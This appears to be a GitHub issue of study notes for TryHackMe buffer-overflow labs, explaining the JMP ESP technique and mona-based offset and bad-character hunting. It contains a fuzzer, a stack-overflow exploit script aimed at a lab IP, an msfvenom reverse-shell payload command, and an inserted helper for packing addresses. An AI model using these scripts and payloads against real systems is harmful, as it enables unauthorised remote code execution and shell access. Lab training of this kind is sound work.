Open WDavid404 opened 9 months ago
We have our shellcode on the stack and need to transfer execution to it without hardcoding the shellcode's stack address. We can use a JMP instruction to jump to the stack; the top of the stack is pointed to by the ESP register.
We overwrite the return address with the address of a “JMP ESP” instruction, so that when the function returns, execution lands on that instruction and jumps to the stack.
EIP is the instruction pointer. It points to (holds the address of) the first byte of the next instruction to be executed. ESP is the stack pointer. It points to (holds the address of) the most recently pushed value on the stack.
Immunity Debugger
!mona config -set workingfolder c:\mona\%p
Find offset
-- /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 700
-- !mona findmsp -distance 700
Find bad characters: -- generate bytearray (all_chars.py)
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')   # prints \x01\x02...\xff on one line
print()
-- !mona bytearray -b "\x00"
-- !mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Find jmp esp command: -- !mona jmp -r esp -cpb "\x00\x07\x2e\xa0" (bad characters)
--> the address 625011AF
Update our retn variable with the new address, written backward (bytes reversed), since the system is little-endian.
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00{bad characters}" -f python
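Added example, not part of these notes or the TryHackMe material: it shows in plain Python the little-endian packing of the JMP ESP address found above, the bad-character check to run on that address before using it as retn, and the comparison that `!mona compare` performs against the bytearray. The bad-character set "\x00\x07\x2e\xa0" and the address 625011AF are the page's own values; the memory dump is constructed.

```python
import struct

# Bad characters from the notes' mona jmp command (page values)
BAD_CHARS = b"\x00\x07\x2e\xa0"

def make_bytearray(bad=b"\x00"):
    """Bytes 0x01..0xff with the bad characters left out; this is the
    test string `!mona bytearray -b` writes (0x00 is excluded by default)."""
    return bytes(x for x in range(1, 256) if x not in bad)

def bad_bytes_in_address(addr, bad=BAD_CHARS):
    """Return the bytes of a 32-bit address that collide with bad characters.
    Run this on the JMP ESP address before using it as retn."""
    return [b for b in struct.pack("<I", addr) if b in bad]

def pack_return_address(addr, bad=BAD_CHARS):
    """Pack the address little-endian: 0x625011AF becomes \\xaf\\x11\\x50\\x62,
    the 'written backward' form from the notes. Refuses an address whose
    bytes include a bad character, since it would be mangled in transit."""
    clash = bad_bytes_in_address(addr, bad)
    if clash:
        raise ValueError("address %#010x contains bad byte(s) %r" % (addr, clash))
    return struct.pack("<I", addr)

def first_mangled_byte(sent, seen):
    """What `!mona compare` does: line up the bytearray that was sent with
    the copy read back from memory at ESP and report the first byte that
    was altered, or the byte at which the copy stopped (None if all survived).
    One bad character per round: remove it and repeat until None is returned."""
    for a, b in zip(sent, seen):
        if a != b:
            return a
    if len(seen) < len(sent):
        return sent[len(seen)]   # copy truncated here
    return None

# Constructed demo: the target drops everything from 0x07 onward
if __name__ == "__main__":
    sent = make_bytearray(b"\x00")
    seen = sent[:6]                   # memory dump stops just before 0x07
    print("first bad char: %#04x" % first_mangled_byte(sent, seen))  # 0x07
    print(pack_return_address(0x625011AF).hex())                     # af115062
```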
Note: don't send an overly long payload at once. For example, with OVERFLOW2 the problem shows up at 700 bytes (EIP becomes AAAA), but if you send a 5000-byte payload, EIP will not be AAAA.
import socket

ip = "10.10.198.14"
port = 1337
prefix = "OVERFLOW3 "
offset = 1000
overflow = "A" * offset      # filler up to the saved return address
retn = ""                    # JMP ESP address, little-endian, goes here
padding = "\x90" * 16        # NOP sled in front of the payload
payload = ""                 # msfvenom output goes here
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")
#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.198.14"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)   # read the banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)   # no reply within the timeout means the service crashed
    except:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"   # grow the buffer by 100 bytes each round
    time.sleep(1)
Good video: https://www.youtube.com/watch?v=skvjS4OX8cg
https://tryhackme.com/room/bof1 https://tryhackme.com/room/bufferoverflowprep